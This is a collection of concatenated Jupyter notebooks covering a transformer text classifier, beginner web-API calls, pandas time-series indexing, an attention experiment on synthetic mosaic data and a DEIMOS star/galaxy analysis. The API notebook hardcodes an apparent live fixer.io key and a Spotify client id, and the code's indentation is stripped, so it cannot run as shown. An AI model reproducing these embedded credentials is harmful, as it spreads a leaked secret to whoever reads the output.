mx = max_length
print(f'- maximum sequence length: {mx}')
#creating the original network and couting the parameters of different networks
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
model = CTransformer(emb=embedding_size, heads=num_heads, depth=depth, seq_length=mx, num_tokens=vocab_size, num_classes=NUM_CLS, max_pool=max_pool)
if torch.cuda.is_available():
model.cuda()
temp = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f'The model architecture:\n\n', model)
print(f'\nThe model has {temp:,} trainable parameters')
# + id="oCtZ-cm4zQhT"
# start training
optimizer = torch.optim.Adam(lr = 0.0001, params=model.parameters())
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lambda i: min(i / (10000/batch_size), 1.0))
num_epochs = 10
criterion = nn.NLLLoss()
save_path = 'CTransformersNet.pt'
# train_losses, val_losses = trainF(model, train_iter, val_iter, num_epochs, criterion, save_path)
# + id="Jf0OQqFGzVNJ" outputId="e59eab81-5171-415d-96d5-84f970a9a2ca" colab={"base_uri": "https://localhost:8080/", "height": 104}
# Evaluation on previously saved models
load_model = CTransformer(emb=embedding_size, heads=num_heads, depth=depth, seq_length=mx, num_tokens=vocab_size, num_classes=NUM_CLS, max_pool=max_pool)
load_model = load_model.to(device)
load_optimizer = torch.optim.Adam(load_model.parameters(),lr = 0.0001)
save_path = 'CTransformersNet.pt'
best_val_loss = load_checkpoint(load_model, save_path, load_optimizer)
print(best_val_loss)
eval(load_model, test_iter)
# + id="MpTxSjqrzZG4" outputId="86865754-3ac7-42b0-92bc-26f2bb18a036" colab={"base_uri": "https://localhost:8080/", "height": 279}
#plotting of training and validation loss
plt.xlabel('epoch')
plt.ylabel('loss')
plt.plot(train_losses, label='Train Loss')
plt.plot(val_losses, label="Validation Loss")
plt.legend(bbox_to_anchor=(1.05, 1.0), loc='upper left')
plt.savefig('lossclassifier.png')
plt.show()
# + [markdown] id="ZYoTVv5wGscH"
# Prediction
# + id="POSsAFdJRK6Q" outputId="f4bafe93-9e1b-4404-bf11-c5f4a8b4fd13" colab={"base_uri": "https://localhost:8080/", "height": 35}
print(TEXT.vocab.itos[:10])
# + id="T9p-hsDudXYn" outputId="65ea2ce7-cb2e-4148-de98-a93c2ce6ed6f" colab={"base_uri": "https://localhost:8080/", "height": 55}
import spacy
from spacy.tokenizer import Tokenizer
nlp = spacy.load("en_core_web_sm")
tokenizer = Tokenizer(nlp.vocab)
x = "If you're going to watch this movie, avoid any spoilers, even spoiler free reviews. Which is why I'm not going to say anything about the movie. Not even my opinion. All I'm going to say is: The crowd applauded 3 times during the movie, and stood up to clap their hands after. This I have never witnessed in a Dutch cinema. Dutch crowds aren't usually passionate about this. I checked the row where I was sitting, and people were crying. After the movie, I was seeing people with smudged mascara. That's all I have to say about the movie."
list_of_strings = [tok.text for tok in tokenizer(x)]
print(list_of_strings)
# + id="z64F14Db-Mj1" outputId="6c5c4b63-0ae9-47d1-ac29-90094edb015e" colab={"base_uri": "https://localhost:8080/", "height": 35}
context = [TEXT.vocab.stoi[c] for c in list_of_strings]
context = np.asarray(context)
context = torch.from_numpy(context)
# + id="o9--tVeejxCu" outputId="b18b9cbf-d1b7-4a5a-8fb0-c7f48ff0eee3" colab={"base_uri": "https://localhost:8080/", "height": 104}
with torch.no_grad():
model.eval()
x = context.view(1, -1)
input = x.to(device)
print(input.shape)
out = model(input)
print (out)
label = out.argmax(dim=1)
print (label)
label += 1
print (label)
print(LABEL.vocab.itos[label])
|
notebooks/classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # More API Examples
#
# This notebook contains EVEN MORE API examples so you can get an idea of the types of services available. There's a world of API's out there for the taking, and we cannot teach them all to you. We can only teach you how they work in general... the details are 100% up to you!
#
#
#
# ### You should get your own API keys as appropriate. No guarantees my keys will work for you
# # Caller Id/ Get a location for a Phone number
#
# This uses the cosmin phone number lookup API as found on https://market.mashape.com/explore
#
# This api requires `headers` to be passed into the `get()` request. The API key and the requested output of `json` are sent into the header.
#
# Enter a phone number as input like `3154432911` and then the API will output JSON data consisting of caller ID data and GPS coordinates.
# +
import requests
phone = input("Enter your phone number: ")
params = { 'phone' : phone }
headers={ "X-Mashape-Key": "<KEY>",
"Accept": "application/json" }
response = requests.get("https://cosmin-us-phone-number-lookup.p.mashape.com/get.php", params=params, headers=headers )
phone_data = response.json()
phone_data
# -
# # Get current exchange rates
#
# This example uses http://fixer.io to get the current currency exchange rates.
#
import requests
apikey = '159f1a48ad7a3d6f4dbe5d5a71c2135c' # get your own at fixer.io
params = { 'access_key': apikey } # US Dollars
response = requests.get("http://data.fixer.io/api/latest", params=params )
rates = response.json()
rates
# # GeoIP lookup: Find the lat/lng of an IP Address
#
# Every computer on the internet has a unique IP Address. This service when given an IP address will return back where that IP Address is located. Pretty handy API which is commonly used with mobile devices to determine approximate location when the GPS is turned off.
import requests
ip = "192.168.3.11"
apikey = '<KEY>' # get your own at ipstack.com
params = { 'access_key': apikey } # US Dollars
url = f"http://api.snoopi.io/{ip}"
response = requests.get( url, params=params )
rates = response.json()
rates
# ## An API for sentiment analysis...
#
# Process some text and more here: http://text-processing.com
#
# sentiment
message = input("How are you feeling today? ")
url = 'http://text-processing.com/api/sentiment/'
options = { 'text' : message}
response = requests.post(url, data = options)
sentiment = response.json()
print(sentiment)
# ## Searching iTunes
#
# Here's an example of the iTunes search API. I'm searching for "Mandatory fun" and printing out the track names.
term = 'Mandatory Fun'
params = { 'term' : term }
response = requests.get('https://itunes.apple.com/search', params = params)
search = response.json()
for r in search['results']:
print(r['trackName'])
# # Earthquakes anyone?
#
# Here's an example of the significant earthquakes from the past week. Information on this API can be found here:
#
# http://earthquake.usgs.gov/earthquakes/feed/v1.0/geojson.php
#
response = requests.get('https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/significant_week.geojson')
quakes = response.json()
for q in quakes['features']:
print(q['properties']['title'])
# # Spotify
#
# The spotify example shows you how to call an API which uses the OAUTH2 prococol. **This is a two step process.** The first request, you request a token, and in the second request you call the api with that token. Twitter, Facebook, Google, and many other services use this approach.
#
# Typically you will use the **client credentials flow**, which does not explicitly require the user to consent.
# https://developer.spotify.com/documentation/general/guides/authorization-guide/
#
# API's that use this approach will issue you a client id and a client secret. The id is always the same but the secret may be changed.
#
# We use that client id and client secret to get an bearer access token. Notice how we pass into the post a named argument `auth=` which authenticates with the client id/secret.
#
# Next we use the bearer access token to make subsequent calls to the api.
#
# +
from base64 import b64encode
# USE YOUR OWN CREDENTIALS THESE ARE EXAMPLES
client_id = "413fe60240a7ad1881bcca301a345"
client_secret = "<KEY>"
# Step one, get the access token
payload = { 'grant_type' : 'client_credentials'}
response = requests.post("https://accounts.spotify.com/api/token", auth=(client_id,client_secret),data=payload)
token = response.json()['access_token']
print(f"Access token: {token}")
# Step two and beyond, use the access token to call the api
url = "https://api.spotify.com/v1/tracks/<KEY>"
header = {"Authorization" : f"Bearer {token}"}
response = requests.get(url, headers=header)
response.json()
|
lessons/11-webapis/WMC3-More-API-Examples.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import matplotlib.pyplot as plt
plt.style.use('seaborn')
# %matplotlib inline
sales = pd.read_csv('data/sales-feb-2015.csv', index_col='Date', parse_dates=True)
sales.head()
sales.info()
sales.loc['2015-02-04 21:52:45', 'Company']
sales.loc['2015-2-5']
sales.loc['2015-2']
sales.loc['2015-2-16':'2015-2-20']
daily_mean = sales.resample('D').mean()
daily_mean
print(daily_mean.loc['2015-2-2'])
print(sales.loc['2015-2-2', 'Units'])
sales.loc['2015-2-2', 'Units'].mean()
sales.resample('D').sum().max()
sales.resample('W').count()
# Input Description
#
# - ‘min’, ‘ T’ minute
# - ‘H’ hour
# - ‘D’ day
# - ‘B’ business day
# - ‘W’ week
# - ‘M’ month
# - ‘Q’ quarter
# - ‘A’ year
sales.loc[:,'Units'].resample('2W').sum()
two_days = sales.loc['2015-2-4': '2015-2-5', 'Units']
two_days
# # Manipulate String
sales['Company'].str.upper()
sales['Product'].str.contains('ware')
sales['Product'].str.contains('ware').sum()
sp500 = pd.read_csv('data/sp500.csv', parse_dates=True, index_col= 'Date')
sp500.head()
sp500['Close'].plot()
sp500['Close'].plot(title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
sp500.loc['2015-4-1':'2015-5-1', 'Close'].plot(title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
sp500.loc['2015-4-1':'2015-5-1', 'Close'].plot(style='k.-', title='S&P 500')
plt.ylabel('Closing Price (US Dollars)')
# - color = k: black, - b: blue , g: green, - r: red , c: cyan
# - marker = . : dot, o: circle, *: star, s: square, +: plus
# - Line type = -: solid, .: dotted, –: dashed
#
sp500['Close'].plot(title='S&P 500', kind = 'area')
plt.ylabel('Closing Price (US Dollars)')
sp500.loc['2015', ['Close', 'Volume']].plot(title='S&P 500', subplots=True)
|
Bagian 4 - Fundamental Pandas/3. Indexing Time Series.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="VAYu3ISwwGks"
import numpy as np
import pandas as pd
import torch
import torchvision
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from matplotlib import pyplot as plt
# %matplotlib inline
from scipy.stats import entropy
# + id="l7cwckMRQnX1" colab={"base_uri": "https://localhost:8080/"} outputId="0cc860ef-a4ea-4aa2-85b6-661f2043230e"
from google.colab import drive
drive.mount('/content/drive')
# + id="gT3NftTEQnP8"
path="/content/drive/MyDrive/Research/alpha_analysis/"
# + id="ueNIyXZNQqht"
name="_50_50_10runs_entropy"
# + id="TjEp-LtqiWAf"
# mu1 = np.array([3,3,3,3,0])
# sigma1 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu2 = np.array([4,4,4,4,0])
# sigma2 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu3 = np.array([10,5,5,10,0])
# sigma3 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu4 = np.array([-10,-10,-10,-10,0])
# sigma4 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu5 = np.array([-21,4,4,-21,0])
# sigma5 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu6 = np.array([-10,18,18,-10,0])
# sigma6 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu7 = np.array([4,20,4,20,0])
# sigma7 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu8 = np.array([4,-20,-20,4,0])
# sigma8 = np.array([[16,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu9 = np.array([20,20,20,20,0])
# sigma9 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# mu10 = np.array([20,-10,-10,20,0])
# sigma10 = np.array([[1,1,1,1,1],[1,16,1,1,1],[1,1,1,1,1],[1,1,1,1,1],[1,1,1,1,1]])
# sample1 = np.random.multivariate_normal(mean=mu1,cov= sigma1,size=500)
# sample2 = np.random.multivariate_normal(mean=mu2,cov= sigma2,size=500)
# sample3 = np.random.multivariate_normal(mean=mu3,cov= sigma3,size=500)
# sample4 = np.random.multivariate_normal(mean=mu4,cov= sigma4,size=500)
# sample5 = np.random.multivariate_normal(mean=mu5,cov= sigma5,size=500)
# sample6 = np.random.multivariate_normal(mean=mu6,cov= sigma6,size=500)
# sample7 = np.random.multivariate_normal(mean=mu7,cov= sigma7,size=500)
# sample8 = np.random.multivariate_normal(mean=mu8,cov= sigma8,size=500)
# sample9 = np.random.multivariate_normal(mean=mu9,cov= sigma9,size=500)
# sample10 = np.random.multivariate_normal(mean=mu10,cov= sigma10,size=500)
# + id="5YDnxeP-2_1V"
# X = np.concatenate((sample1,sample2,sample3,sample4,sample5,sample6,sample7,sample8,sample9,sample10),axis=0)
# Y = np.concatenate((np.zeros((500,1)),np.ones((500,1)),2*np.ones((500,1)),3*np.ones((500,1)),4*np.ones((500,1)),
# 5*np.ones((500,1)),6*np.ones((500,1)),7*np.ones((500,1)),8*np.ones((500,1)),9*np.ones((500,1))),axis=0).astype(int)
# print(X.shape,Y.shape)
# # plt.scatter(sample1[:,0],sample1[:,1],label="class_0")
# # plt.scatter(sample2[:,0],sample2[:,1],label="class_1")
# # plt.scatter(sample3[:,0],sample3[:,1],label="class_2")
# # plt.scatter(sample4[:,0],sample4[:,1],label="class_3")
# # plt.scatter(sample5[:,0],sample5[:,1],label="class_4")
# # plt.scatter(sample6[:,0],sample6[:,1],label="class_5")
# # plt.scatter(sample7[:,0],sample7[:,1],label="class_6")
# # plt.scatter(sample8[:,0],sample8[:,1],label="class_7")
# # plt.scatter(sample9[:,0],sample9[:,1],label="class_8")
# # plt.scatter(sample10[:,0],sample10[:,1],label="class_9")
# # plt.legend(bbox_to_anchor=(1.05, 1), loc='upper left')
# + id="k6YzqPUf3CHa"
# class SyntheticDataset(Dataset):
# """MosaicDataset dataset."""
# def __init__(self, x, y):
# """
# Args:
# csv_file (string): Path to the csv file with annotations.
# root_dir (string): Directory with all the images.
# transform (callable, optional): Optional transform to be applied
# on a sample.
# """
# self.x = x
# self.y = y
# #self.fore_idx = fore_idx
# def __len__(self):
# return len(self.y)
# def __getitem__(self, idx):
# return self.x[idx] , self.y[idx] #, self.fore_idx[idx]
# + id="4Mi3nL5-4D7_"
# trainset = SyntheticDataset(X,Y)
# # testset = torchvision.datasets.MNIST(root='./data', train=False, download=True, transform=transform)
# + id="HKzc7IgwqoU2"
# classes = ('zero','one','two','three','four','five','six','seven','eight','nine')
# foreground_classes = {'zero','one','two'}
# fg_used = '012'
# fg1, fg2, fg3 = 0,1,2
# all_classes = {'zero','one','two','three','four','five','six','seven','eight','nine'}
# background_classes = all_classes - foreground_classes
# background_classes
# + id="eT6iKHutquR8"
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=100, shuffle=True)
# + id="IWKzXkPSq5KU"
# dataiter = iter(trainloader)
# background_data=[]
# background_label=[]
# foreground_data=[]
# foreground_label=[]
# batch_size=100
# for i in range(50):
# images, labels = dataiter.next()
# for j in range(batch_size):
# if(classes[labels[j]] in background_classes):
# img = images[j].tolist()
# background_data.append(img)
# background_label.append(labels[j])
# else:
# img = images[j].tolist()
# foreground_data.append(img)
# foreground_label.append(labels[j])
# foreground_data = torch.tensor(foreground_data)
# foreground_label = torch.tensor(foreground_label)
# background_data = torch.tensor(background_data)
# background_label = torch.tensor(background_label)
# + id="ChdziOP3rF1G"
# def create_mosaic_img(bg_idx,fg_idx,fg):
# """
# bg_idx : list of indexes of background_data[] to be used as background images in mosaic
# fg_idx : index of image to be used as foreground image from foreground data
# fg : at what position/index foreground image has to be stored out of 0-8
# """
# image_list=[]
# j=0
# for i in range(9):
# if i != fg:
# image_list.append(background_data[bg_idx[j]])
# j+=1
# else:
# image_list.append(foreground_data[fg_idx])
# label = foreground_label[fg_idx] - fg1 # minus fg1 because our fore ground classes are fg1,fg2,fg3 but we have to store it as 0,1,2
# #image_list = np.concatenate(image_list ,axis=0)
# image_list = torch.stack(image_list)
# return image_list,label
# + id="0ASrmPqErIDM"
# desired_num = 3000
# mosaic_list_of_images =[] # list of mosaic images, each mosaic image is saved as list of 9 images
# fore_idx =[] # list of indexes at which foreground image is present in a mosaic image i.e from 0 to 9
# mosaic_label=[] # label of mosaic image = foreground class present in that mosaic
# list_set_labels = []
# for i in range(desired_num):
# set_idx = set()
# np.random.seed(i)
# bg_idx = np.random.randint(0,3500,8)
# set_idx = set(background_label[bg_idx].tolist())
# fg_idx = np.random.randint(0,1500)
# set_idx.add(foreground_label[fg_idx].item())
# fg = np.random.randint(0,9)
# fore_idx.append(fg)
# image_list,label = create_mosaic_img(bg_idx,fg_idx,fg)
# mosaic_list_of_images.append(image_list)
# mosaic_label.append(label)
# list_set_labels.append(set_idx)
# + id="SDFN7dCarmmR"
# def create_avg_image_from_mosaic_dataset(mosaic_dataset,labels,foreground_index,dataset_number):
# """
# mosaic_dataset : mosaic_dataset contains 9 images 32 x 32 each as 1 data point
# labels : mosaic_dataset labels
# foreground_index : contains list of indexes where foreground image is present so that using this we can take weighted average
# dataset_number : will help us to tell what ratio of foreground image to be taken. for eg: if it is "j" then fg_image_ratio = j/9 , bg_image_ratio = (9-j)/8*9
# """
# avg_image_dataset = []
# for i in range(len(mosaic_dataset)):
# img = torch.zeros([5], dtype=torch.float64)
# for j in range(9):
# if j == foreground_index[i]:
# img = img + mosaic_dataset[i][j]*dataset_number/9
# else :
# img = img + mosaic_dataset[i][j]*(9-dataset_number)/(8*9)
# avg_image_dataset.append(img)
# return torch.stack(avg_image_dataset) , torch.stack(labels) , foreground_index
# + id="whGsdvMSzIUK"
class MosaicDataset1(Dataset):
"""MosaicDataset dataset."""
def __init__(self, mosaic_list, mosaic_label,fore_idx):
"""
Args:
csv_file (string): Path to the csv file with annotations.
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.mosaic = mosaic_list
self.label = mosaic_label
self.fore_idx = fore_idx
def __len__(self):
return len(self.label)
def __getitem__(self, idx):
return self.mosaic[idx] , self.label[idx] , self.fore_idx[idx]
# + id="5gtR669R1dAF"
# data = [{"mosaic_list":mosaic_list_of_images, "mosaic_label": mosaic_label, "fore_idx":fore_idx}]
# np.save("mosaic_data.npy",data)
# + id="xM-j3o9j1eEU"
data = np.load(path+"mosaic_data.npy",allow_pickle=True)
# + id="pwz1-dL33rcg"
mosaic_list_of_images = data[0]["mosaic_list"]
mosaic_label = data[0]["mosaic_label"]
fore_idx = data[0]["fore_idx"]
# + id="fP5NPRPmb904"
batch = 250
msd = MosaicDataset1(mosaic_list_of_images, mosaic_label, fore_idx)
train_loader = DataLoader( msd,batch_size= batch ,shuffle=True)
# + [markdown] id="ilzPfrih82Bg"
# **Focus Net**
# + id="KzN3Bbs8c0fA"
class Focus_deep(nn.Module):
'''
deep focus network averaged at zeroth layer
input : elemental data
'''
def __init__(self,inputs,output,K,d):
super(Focus_deep,self).__init__()
self.inputs = inputs
self.output = output
self.K = K
self.d = d
self.linear1 = nn.Linear(self.inputs,50) #,self.output)
self.linear2 = nn.Linear(50,self.output)
def forward(self,z):
batch = z.shape[0]
x = torch.zeros([batch,self.K],dtype=torch.float64)
y = torch.zeros([batch,self.d], dtype=torch.float64)
x,y = x.to("cuda"),y.to("cuda")
for i in range(self.K):
x[:,i] = self.helper(z[:,i] )[:,0] # self.d*i:self.d*i+self.d
log_x = F.log_softmax(x,dim=1) # log alpha to calculate entropy
x = F.softmax(x,dim=1) # alphas
x1 = x[:,0]
for i in range(self.K):
x1 = x[:,i]
y = y+torch.mul(x1[:,None],z[:,i]) # self.d*i:self.d*i+self.d
return y , x,log_x
def helper(self,x):
x = F.relu(self.linear1(x))
x = self.linear2(x)
return x
# + [markdown] id="EjrL0Zb484KO"
# **Classification Net**
# + id="w0W0oKcClFZY"
class Classification_deep(nn.Module):
'''
input : elemental data
deep classification module data averaged at zeroth layer
'''
def __init__(self,inputs,output):
super(Classification_deep,self).__init__()
self.inputs = inputs
self.output = output
self.linear1 = nn.Linear(self.inputs,50)
self.linear2 = nn.Linear(50,self.output)
def forward(self,x):
x = F.relu(self.linear1(x))
x = self.linear2(x)
return x
# + id="6fBtRWYgTDtY"
criterion = nn.CrossEntropyLoss()
def my_cross_entropy(x, y,alpha,log_alpha,k):
# log_prob = -1.0 * F.log_softmax(x, 1)
# loss = log_prob.gather(1, y.unsqueeze(1))
# loss = loss.mean()
loss = criterion(x,y)
#alpha = torch.clamp(alpha,min=1e-10)
b = -1.0* alpha * log_alpha
b = torch.mean(torch.sum(b,dim=1))
closs = loss
entropy = b
loss = (1-k)*loss + ((k)*b)
return loss,closs,entropy
# + [markdown] id="4Fd1_nXkyLhE"
#
# + id="ehAfQnNwgFYX"
def calculate_attn_loss(dataloader,what,where,criter,k):
what.eval()
where.eval()
r_loss = 0
cc_loss = 0
cc_entropy = 0
alphas = []
lbls = []
pred = []
fidices = []
with torch.no_grad():
for i, data in enumerate(dataloader, 0):
inputs, labels,fidx = data
lbls.append(labels)
fidices.append(fidx)
inputs = inputs.double()
inputs, labels = inputs.to("cuda"),labels.to("cuda")
avg,alpha,log_alpha = where(inputs)
outputs = what(avg)
_, predicted = torch.max(outputs.data, 1)
pred.append(predicted.cpu().numpy())
alphas.append(alpha.cpu().numpy())
#ent = np.sum(entropy(alpha.cpu().detach().numpy(), base=2, axis=1))/batch
# mx,_ = torch.max(alpha,1)
# entropy = np.mean(-np.log2(mx.cpu().detach().numpy()))
# print("entropy of batch", entropy)
#loss = (1-k)*criter(outputs, labels) + k*ent
loss,closs,entropy = my_cross_entropy(outputs,labels,alpha,log_alpha,k)
r_loss += loss.item()
cc_loss += closs.item()
cc_entropy += entropy.item()
alphas = np.concatenate(alphas,axis=0)
pred = np.concatenate(pred,axis=0)
lbls = np.concatenate(lbls,axis=0)
fidices = np.concatenate(fidices,axis=0)
#print(alphas.shape,pred.shape,lbls.shape,fidices.shape)
analysis = analyse_data(alphas,lbls,pred,fidices)
return r_loss/i,cc_loss/i,cc_entropy/i,analysis
# + id="6e9HQJMzxBhp"
def analyse_data(alphas,lbls,predicted,f_idx):
'''
analysis data is created here
'''
batch = len(predicted)
amth,alth,ftpt,ffpt,ftpf,ffpf = 0,0,0,0,0,0
for j in range (batch):
focus = np.argmax(alphas[j])
if(alphas[j][focus] >= 0.5):
amth +=1
else:
alth +=1
if(focus == f_idx[j] and predicted[j] == lbls[j]):
ftpt += 1
elif(focus != f_idx[j] and predicted[j] == lbls[j]):
ffpt +=1
elif(focus == f_idx[j] and predicted[j] != lbls[j]):
ftpf +=1
elif(focus != f_idx[j] and predicted[j] != lbls[j]):
ffpf +=1
#print(sum(predicted==lbls),ftpt+ffpt)
return [ftpt,ffpt,ftpf,ffpf,amth,alth]
# + colab={"base_uri": "https://localhost:8080/"} id="DTBDprf17TMN" outputId="8f39a553-21fa-4dd9-c9a0-60bea5fb5ea1"
number_runs = 10
full_analysis =[]
FTPT_analysis = pd.DataFrame(columns = ["FTPT","FFPT", "FTPF","FFPF"])
k = 0.005
for n in range(number_runs):
print("--"*40)
# instantiate focus and classification Model
torch.manual_seed(n)
where = Focus_deep(5,1,9,5).double()
torch.manual_seed(n)
what = Classification_deep(5,3).double()
where = where.to("cuda")
what = what.to("cuda")
# instantiate optimizer
optimizer_where = optim.Adam(where.parameters(),lr =0.01)
optimizer_what = optim.Adam(what.parameters(), lr=0.01)
#criterion = nn.CrossEntropyLoss()
acti = []
analysis_data = []
loss_curi = []
epochs = 2000
# calculate zeroth epoch loss and FTPT values
running_loss ,_,_,anlys_data= calculate_attn_loss(train_loader,what,where,criterion,k)
loss_curi.append(running_loss)
analysis_data.append(anlys_data)
print('epoch: [%d ] loss: %.3f' %(0,running_loss))
# training starts
for epoch in range(epochs): # loop over the dataset multiple times
ep_lossi = []
running_loss = 0.0
what.train()
where.train()
for i, data in enumerate(train_loader, 0):
# get the inputs
inputs, labels,_ = data
inputs = inputs.double()
inputs, labels = inputs.to("cuda"),labels.to("cuda")
# zero the parameter gradients
optimizer_where.zero_grad()
optimizer_what.zero_grad()
# forward + backward + optimize
avg, alpha,log_alpha = where(inputs)
outputs = what(avg)
my_loss,_,_ = my_cross_entropy(outputs,labels,alpha,log_alpha,k)
# print statistics
running_loss += my_loss.item()
my_loss.backward()
optimizer_where.step()
optimizer_what.step()
#break
running_loss,ccloss,ccentropy,anls_data = calculate_attn_loss(train_loader,what,where,criterion,k)
analysis_data.append(anls_data)
print('epoch: [%d] loss: %.3f celoss: %.3f entropy: %.3f' %(epoch + 1,running_loss,ccloss,ccentropy))
loss_curi.append(running_loss) #loss per epoch
if running_loss<=0.001:
break
print('Finished Training run ' +str(n))
#break
analysis_data = np.array(analysis_data)
FTPT_analysis.loc[n] = analysis_data[-1,:4]/30
full_analysis.append((epoch, analysis_data))
correct = 0
total = 0
with torch.no_grad():
for data in train_loader:
images, labels,_ = data
images = images.double()
images, labels = images.to("cuda"), labels.to("cuda")
avg, alpha,log_alpha = where(images)
outputs = what(avg)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 3000 train images: %d %%' % ( 100 * correct / total))
# + id="tqSMmYwp8QYT" colab={"base_uri": "https://localhost:8080/"} outputId="edacb009-f1b1-4e49-a638-8e7fe4285d85"
a,b= full_analysis[0]
print(a)
# + id="L31RVViMkYM-" colab={"base_uri": "https://localhost:8080/", "height": 1000} outputId="50955f46-df8b-456b-997c-2c9242456e24"
cnt=1
for epoch, analysis_data in full_analysis:
analysis_data = np.array(analysis_data)
# print("="*20+"run ",cnt,"="*20)
plt.figure(figsize=(6,6))
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,0],label="ftpt")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,1],label="ffpt")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,2],label="ftpf")
plt.plot(np.arange(0,epoch+2,1),analysis_data[:,3],label="ffpf")
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.title("Training trends for run "+str(cnt))
plt.savefig("/content/drive/MyDrive/Research/alpha_analysis/50_50/k01/"+"run"+str(cnt)+name+".png",bbox_inches="tight")
plt.savefig("/content/drive/MyDrive/Research/alpha_analysis/50_50/k01/"+"run"+str(cnt)+name+".pdf",bbox_inches="tight")
cnt+=1
# + id="_ZSZor21zD_f" colab={"base_uri": "https://localhost:8080/"} outputId="eb4dd322-5240-4010-cb09-2e6b705395ba"
np.mean(np.array(FTPT_analysis),axis=0) #array([87.85333333, 5.92 , 0. , 6.22666667])
# + id="URQOm7jAQ7ve"
FTPT_analysis.to_csv(path+"FTPT_analysis"+name+"_"+str(k)+".csv",index=False)
# + id="M5IbA9clS9qf" colab={"base_uri": "https://localhost:8080/", "height": 363} outputId="b5549d4b-1584-4b2f-a15a-f39bd9519fcd"
FTPT_analysis
# + id="qksByUTff7Vu"
|
1_mosaic_data_attention_experiments/3_stage_wise_training/alternate_minimization/effect on interpretability/blob_with_sparse_regulariser/10runs_entropy_005_simultaneous.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: py36
# ---
# # Accuracy vs Mag DEIMOS Spec Test Set
#
# In this notebook we examine the accuracy as a function of magnitude for sources with spectroscopic classifications from DEIMOS COSMOS survey. The DEIMOS set contains $\sim$ 10K sources, and $\sim$ 2.7K sources are crossmatched with PS1 catalog.
#
# The overall accuracy for the classification by the ML model we developed is $\sim$ 95%, but the FoM @FPR=0.05 is lower than 0.4, which is worse than the FoM obtained with HSTxPS1 catalog.
#
# We found the accuracy of the HST classification is also $\sim$ 95%.
# The performance of the ML model, therefore, is reasonable because the ML model is trained with the HST classification.
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
# %matplotlib inline
_df = pd.read_table('DEIMOS/deimos_10K_March2018/deimos.tbl', header=None)
# +
arr = np.empty((len(_df), len(_df.iloc[0][0].split())), dtype='<U50')
for i in range(len(_df)):
i_row = [k for k in _df.iloc[i][0].split(' ') if (k != '')and(k != ' ')]
for j in range(len(_df.iloc[0][0].split())):
arr[i][j] = i_row[j]
# -
df = pd.DataFrame(arr)
ra = np.array(df[1], dtype=float)
dec = np.array(df[2], dtype=float)
sel = np.array(df[3], dtype=int)
imag = np.array(df[4].replace('null', '-999').replace(' null', '-999'), dtype=float)
kmag = np.array(df[5].replace('null', '-999').replace(' null', '-999'), dtype=float)
zspec = np.array(df[6].replace('null', '-999').replace(' null', '-999'), dtype=float)
Qflag = np.array(df[7].replace('null', '-999').replace(' null', '-999'), dtype=int)
Q = np.array(df[8].replace('null', '-999').replace(' null', '-999'), dtype=float)
np.array(df[9][0:20])
# +
sgFlag = np.empty(len(df), dtype=int)
for i in range(len(df[9])):
if 'star' in df[9][i]:
sgFlag[i] = 1 # star
elif 'null' in df[9][i]:
sgFlag[i] = -999 # null
else:
sgFlag[i] = 0 # galaxy
# -
# if "Remarks" contains "star", the source is classifyed star.
plt.hist(imag[sgFlag!=-999], bins=np.arange(15, 28, 0.2), color='0.8', label='All')
plt.hist(imag[sgFlag==0], bins=np.arange(15, 28, 0.2), alpha=0.5, label='GALAXY')
plt.hist(imag[sgFlag==1], bins=np.arange(15, 28, 0.2), alpha=0.5, label='STAR')
plt.yscale('log')
plt.xlabel('i mag'); plt.ylabel('#')
plt.legend(loc='best')
plt.show()
# The distribution of galaxies looks similar to that of the HST COSMOS catalog, but that of stars has a peak at i-mag$\sim$22, which is not shown in that of the HSTxPS1 catalog.
df = pd.DataFrame()
df['ra'] = ra; df['dec'] = dec
df['sel'] = sel
df['imag'] = imag; df['kmag'] = kmag
